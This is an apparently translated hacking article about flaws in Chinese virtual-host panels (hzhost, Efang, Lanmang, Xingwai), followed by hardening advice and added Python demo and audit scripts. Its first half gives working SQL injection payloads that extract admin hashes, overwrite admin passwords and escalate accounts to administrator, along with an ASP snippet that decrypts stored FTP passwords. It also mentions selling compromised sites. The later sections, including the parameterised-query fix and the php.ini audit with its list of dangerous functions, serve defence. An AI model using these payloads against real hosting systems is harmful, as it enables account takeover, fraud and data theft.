Analysis of IDC virtual host security and Influencing Factors

Source: Internet
Author: User
Tags: ftp login, domain name registration

At present most webmasters use virtual hosts, but IDC service providers in China vary widely in quality, and their security varies just as much. Most IDCs use virtual host management software: install it, finish the settings, and the IDC's website and the whole service are ready. All security measures are therefore set automatically by the software. The advantage is obvious: it is convenient and needs no manual intervention. But once the software has a vulnerability, every site on the server suffers. And many IDC providers, because they run a large number of servers, will not patch each machine even when vulnerabilities are known.


When probing the servers that host the target sites, I mainly encountered the following virtual host management software:


-------------------------------------------------------------------------------------------
Xingwai (星外) Virtual Host Management System

This is currently used by about 70% of domestic hosting providers and was once famous for its "bt" (变态, i.e. paranoid) permission settings, but recently around 70% of Xingwai servers have been cracked. The vendor has since fixed the vulnerability and there is basically no writable directory left. What remains annoying is the .NET webshell: running cmd and IISSpy from it directly dumps the registry and the relevant permission settings. The earlier exploitation methods are not covered here; Xingwai has gone back to its "bt" hardening.

 

Huazhong (华众, hzhost) Virtual Host Management System

This is used by about 50% of domestic hosting vendors, and the latest version of hzhost is 6.5. The management page of this version has a serious SQL injection vulnerability that lets you change the back-end password of a virtual host. The program domain/login.asp does not effectively filter user-submitted parameters, which leads to the SQL injection.

Open domain name management and type the test string into the domain name box. How do you tell whether the vulnerability exists? Enter sectop' (with a trailing single quote): the page throws an MSSQL error, which confirms the injection.

First dump the administrator password with an error-based query: sectop' and (select top 1 isnull(cast([u_nme] as nvarchar(4000)),char(32))+char(94)+isnull(cast([u_pss] as nvarchar(4000)),char(32)) from (select top 2 u_nme,u_pss from [hzhost]..[memlst] where 1=1 order by [u_nme]) t order by [u_nme] desc)>0-- and '1'='1

The subquery concatenates username^hash for one row of memlst; comparing that string with 0 forces an nvarchar-to-int conversion, and MSSQL echoes the offending value in its error message. Changing "top 2" walks through the table row by row.

The password is stored as an MD5 hash, which you can look up on the major online cracking sites; a complex password will not be recovered quickly. In that case you can change the management password (change it back after use). Statement: sectop' update [memlst] set u_pss='xxxxxxxx' where u_nme='admin'-- sets the administrator's password field to xxxxxxxx; since the field holds an MD5 hash, the value you write must be the MD5 of the password you intend to log in with. You can also escalate a self-registered ordinary account to administrator: register at the front end, then submit
Statements:
sectop' update [memlst] set u_sys=6 where u_nme='your registered username'--
sectop' update [memlst] set u_pwr=2 where u_nme='your registered username'--
Submitting these two statements raises your account to administrator. Afterwards you can log on to the console and open the management page, or go straight to the back-end address.

From the back end you can top up your own balance and enable domains and hosting space for yourself, so this vulnerability is very dangerous.
-------------------------------------------------------------------------------------------
Efang (易方) Virtual Host Management Software

http://www.bkjia.com/Pdt_List.asp?Sort=EM'
http://www.bkjia.com/Pdt_List.asp?Sort=EM' and '1'='1
The second request returns the normal page, so the Sort parameter is injectable.
Detection with NBSI:

Note: feature characters (特征字符) need to be added. The Ah-D (啊D) injection tool cannot extract the data here; only NBSI or manual injection works. Administrator table: EfangAdmin

The password is encrypted; it looks like MD5.

The annoying part of the Efang host system is that its web directory has a random name, but the path can be obtained from another site on the same server (cross-site).
-------------------------------------------------------------------------------------------
Lanmang (蓝芒) Virtual Host Management System

The problem lies in Scripts/agent/Combine/buy.asp:

strSQL = "Select a.*, b.STName from v_ProdInfo a, T_DNS_ServiceType b where a.STCode = b.STCode" & _
         " And a.ProdCode = '" & Request("ID") & "' and a.ProdStat <> '3'"
Set Rs = Server.CreateObject("ADODB.Recordset")
Rs.Open strSQL, Cn, 1, 1
If Rs.Eof Then
    Response.Write "<br><p align='center'>unable to purchase this product</p>"
    Rs.Close
    Cn.Close
    Call PrintPageBottom
    Response.End
End If

It is easy to see that the ID parameter goes from Request straight into the query string without any processing, so there is a very simple injection. To test it on a Lanmang site you must first register a user and log in, then go to business application and open domain name registration. Hover over the "details" link of a product and note its ProdCode value; here it is com (as in http://www.bkjia.com/scripts/agent/ProductInfo.asp?ProdCode=com), but on many sites it is numeric, for example 101. Adjust accordingly, then construct the injection URLs.

http://www.bkjia.com/Scripts/agent/Combine/buy.asp?Id=com' and 1=1--
http://www.bkjia.com/Scripts/agent/Combine/buy.asp?Id=com' and 1=2--

In the end I extracted the password 941CFBCF40B96B8169CEC930976FEC00. It is not hard to notice that the virtual host management page contains an FTP login link of the form ftp://user:password@202.99.12.25, and the password in that link is the very value stored in the data table. In other words, Lanmang uses a reversible algorithm for passwords. So I went back to the code and found the decoding function. It lives in a COM component, so there is no need to understand the algorithm itself; all you need is the ciphertext:

<%
Password = "25E41385F01E381944F0646AE44187AA"
Set aspvdf = Server.CreateObject("BlueEncrypt.Decode")
%>
The password is <%= aspvdf.DeStr(Password) %>

Replace the Password value with the ciphertext from the table and the plaintext comes out.
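The three panels above (hzhost's domain/login.asp, Efang's Pdt_List.asp and Lanmang's buy.asp) share one defect: a request parameter concatenated into the SQL text. The Python script below is an added example, not code from the article or from any of those vendors. It reproduces that pattern against an in-memory SQLite database, runs the true/false probe from the Lanmang section and the stacked UPDATE payloads from the hzhost section against it, and shows the parameterised query that closes the hole. Table and column names follow the article (v_ProdInfo, ProdCode, memlst, u_sys, u_pwr); the rows and the other columns are constructed for the demo. SQLite's execute() refuses stacked statements, so executescript() stands in for what ADO on MSSQL does with a single query string.

```python
"""
Added example (not from the original article or from any hosting panel vendor):
the string-concatenation bug shared by buy.asp, domain/login.asp and
Pdt_List.asp, reproduced against SQLite, beside the parameterised fix.
Table names follow the article; the rows are constructed sample data.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the panel's tables."""
    cn = sqlite3.connect(":memory:")
    cn.executescript(
        """
        CREATE TABLE v_ProdInfo (ProdCode TEXT, ProdName TEXT, ProdStat TEXT);
        INSERT INTO v_ProdInfo VALUES ('com', '.com domain', '1');
        INSERT INTO v_ProdInfo VALUES ('101', 'basic vhost', '1');
        INSERT INTO v_ProdInfo VALUES ('cn',  '.cn domain',  '3');
        CREATE TABLE memlst (u_nme TEXT, u_pss TEXT, u_sys INTEGER, u_pwr INTEGER);
        INSERT INTO memlst VALUES ('admin', '21232f297a57a5a743894a0e4a801fc3', 6, 2);
        INSERT INTO memlst VALUES ('guest', '084e0343a1d5e0b5c3a7a8a1e8ad2f1c', 1, 0);
        """
    )
    return cn


def buy_vulnerable(cn: sqlite3.Connection, prod_id: str) -> list:
    """Mirrors buy.asp: Request("ID") is pasted straight into the SQL text."""
    sql = ("SELECT * FROM v_ProdInfo a WHERE a.ProdCode = '" + prod_id
           + "' AND a.ProdStat <> '3'")
    return cn.execute(sql).fetchall()


def buy_fixed(cn: sqlite3.Connection, prod_id: str) -> list:
    """Same query with a bound parameter: the input can never alter the SQL."""
    sql = "SELECT * FROM v_ProdInfo a WHERE a.ProdCode = ? AND a.ProdStat <> '3'"
    return cn.execute(sql, (prod_id,)).fetchall()


def boolean_probe(query, base: str) -> bool:
    """The two-URL test from the article: a tautology and a contradiction
    appended after a closing quote. If only the tautology returns rows,
    the parameter is injectable."""
    true_rows = query(base + "' AND 1=1 --")
    false_rows = query(base + "' AND 1=2 --")
    return len(true_rows) > 0 and len(false_rows) == 0


def domain_lookup_vulnerable(cn: sqlite3.Connection, domain: str) -> None:
    """Stands in for domain/login.asp. ADO on MSSQL runs stacked statements,
    which executescript() also allows, so an injected UPDATE after the
    closing quote runs with the application's database rights."""
    cn.executescript("SELECT * FROM memlst WHERE u_nme = '" + domain + "'")


def escalate(cn: sqlite3.Connection, user: str) -> tuple:
    """The two UPDATE payloads from the hzhost section sent through the
    stacked-query sink; returns the victim row's (u_sys, u_pwr) afterwards."""
    domain_lookup_vulnerable(
        cn, "sectop'; UPDATE memlst SET u_sys = 6 WHERE u_nme = '" + user + "' --")
    domain_lookup_vulnerable(
        cn, "sectop'; UPDATE memlst SET u_pwr = 2 WHERE u_nme = '" + user + "' --")
    return cn.execute(
        "SELECT u_sys, u_pwr FROM memlst WHERE u_nme = ?", (user,)).fetchone()


if __name__ == "__main__":
    cn = make_db()
    print("buy.asp pattern injectable:", boolean_probe(lambda s: buy_vulnerable(cn, s), "com"))
    print("parameterised version injectable:", boolean_probe(lambda s: buy_fixed(cn, s), "com"))
    print("guest flags after escalation:", escalate(cn, "guest"))  # (6, 2)
```

In classic ASP the equivalent of buy_fixed is an ADODB.Command with Parameters instead of a concatenated string; note that escaping quotes alone does not help buy.asp on sites whose ProdCode is numeric, because the value is then not quoted at all.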

-------------------------------------------------------------------------------------------
Integrated virtual host software is easy to manage, but once it has a vulnerability the impact is just as obvious. A manually configured server with strictly set permissions is far more secure than any of this software.

However, I found that only a few servers are configured by hand. As a result, after taking a target site I often end up with the whole server, and the resources of every site on it are available. A single site sells for a few hundred; small sites are harder to sell and fetch a bit less, and selling plug-ins to traffic vendors also works.

Given so many vulnerabilities in virtual host management systems, some readers may want to configure a secure virtual host themselves. Security is a whole, and most of it lies in the details of the configuration.

Let's look at the two platforms in turn:

The first is Windows. The typical stack is IIS + ASP + ASPX + PHP + MySQL + MSSQL; JSP hosting uses IIS + Tomcat + JDK (some providers use JBoss, but Tomcat is the most common).

In IIS, give each site its own user in the Guests group, and set NTFS permissions on the site root and on the IIS anonymous (connection) account separately. To run ASPX, that user must also be added to the IIS_WPG group, and the site should get its own application pool whose worker process runs under that dedicated account. Delete unneeded script mappings such as .asa and .cer, and add a mapping for .mdb so that Access databases cannot be downloaded. For MSSQL, connect with a low-privilege (public) account: if the site connects as db_owner, anyone who knows the web path can easily write a one-line webshell with the database backup trick. For MySQL, use GRANT to give each user rights on its own database only and never use root; wait until the CMS is installed (installation may need CREATE TABLE and similar), then leave only SELECT, INSERT, UPDATE and DELETE. On the system, remove dangerous components such as WScript.Shell, and set disk permissions so that one site cannot reach another site's directories.

For the IIS + Tomcat + JDK architecture, note that after installing Tomcat you must create a low-privilege user and configure the Tomcat service to run under that account; otherwise a single webshell compromises the whole server.

The second is Linux. The typical stack is Apache + MySQL + PHP (some foreign IDCs use nginx or lighttpd as the web server). In Apache, use php_admin_value open_basedir in each virtual host to stop PHP from browsing outside the site's own directory. In php.ini, set display_errors to Off, otherwise error messages expose the web path, and use disable_functions to block dangerous functions such as system and exec. Run Apache under its own dedicated user. For MySQL, a shell script can take daily or weekly backups. Services such as FTP should run over an encrypted channel wherever possible (FTPS, or SFTP over SSH instead of plain FTP) so that credentials cannot be sniffed.
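The Python script below is an added example, not part of the original article. It reads a php.ini and an Apache virtual-host file offline and flags the settings this paragraph calls for: display_errors Off, command-execution functions in disable_functions, and php_admin_value open_basedir in every vhost. The sample configuration texts are constructed; the list of functions to block extends the page's "system and exec" with their usual companions, which is my addition rather than the article's list.

```python
"""
Added example, not from the original article: an offline audit of the php.ini
and Apache virtual-host settings recommended in the Linux section. The sample
configuration text is constructed inline for the demo.
"""
import re

# The article names system and exec; the rest are the usual companions that
# give the same command-execution capability (my addition, not the page's list).
DANGEROUS_FUNCTIONS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}


def parse_php_ini(text: str) -> dict:
    """Minimal php.ini reader: ';' starts a comment, '[section]' headers are
    skipped, keys are case-insensitive and surrounding quotes are dropped.
    (Values that themselves contain ';' are not handled.)"""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def ini_bool(value: str) -> bool:
    """PHP's loose boolean interpretation of ini values."""
    return value.strip().lower() in {"1", "on", "true", "yes"}


def audit_php_ini(text: str) -> list:
    """Return one finding string per weak setting (empty list = hardened)."""
    s = parse_php_ini(text)
    findings = []
    # PHP's compiled-in default for display_errors is On, so an absent key is a finding too.
    if ini_bool(s.get("display_errors", "1")):
        findings.append("display_errors is On: PHP errors will reveal the web root path")
    disabled = {f.strip() for f in s.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(DANGEROUS_FUNCTIONS - disabled)
    if missing:
        findings.append("disable_functions leaves command execution enabled: " + ", ".join(missing))
    if not s.get("open_basedir"):
        findings.append("open_basedir unset globally; each vhost must set it via php_admin_value")
    return findings


def audit_apache_vhosts(text: str) -> list:
    """Flag every <VirtualHost> that lacks php_admin_value open_basedir, i.e.
    a tenant whose PHP scripts could read other tenants' directories."""
    findings = []
    for m in re.finditer(r"<VirtualHost[^>]*>(.*?)</VirtualHost>", text, re.S):
        body = m.group(1)
        name = re.search(r"ServerName\s+(\S+)", body)
        label = name.group(1) if name else "<unnamed vhost>"
        if not re.search(r"php_admin_value\s+open_basedir\s+\S+", body):
            findings.append(label + ": no php_admin_value open_basedir")
    return findings


# Constructed samples: a typical weak php.ini, its hardened counterpart, and
# two vhosts of which only the first is locked to its own directory.
WEAK_PHP_INI = """
[PHP]
display_errors = On
disable_functions =
; open_basedir left unset
"""

HARDENED_PHP_INI = """
[PHP]
display_errors = Off
disable_functions = system,exec,shell_exec,passthru,popen,proc_open
open_basedir = "/var/www/"
"""

SAMPLE_VHOSTS = """
<VirtualHost *:80>
    ServerName site1.example
    DocumentRoot /var/www/site1
    php_admin_value open_basedir /var/www/site1:/tmp
</VirtualHost>
<VirtualHost *:80>
    ServerName site2.example
    DocumentRoot /var/www/site2
</VirtualHost>
"""

if __name__ == "__main__":
    for label, text in (("weak php.ini", WEAK_PHP_INI), ("hardened php.ini", HARDENED_PHP_INI)):
        print(label, "->", audit_php_ini(text) or ["ok"])
    print("vhosts ->", audit_apache_vhosts(SAMPLE_VHOSTS) or ["ok"])
```

open_basedir is checked in both places on purpose: a global value in php.ini only stops PHP from leaving the shared web root, while the per-vhost php_admin_value (which a tenant cannot override from .htaccess or ini_set) is what keeps one site out of the other sites' directories.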
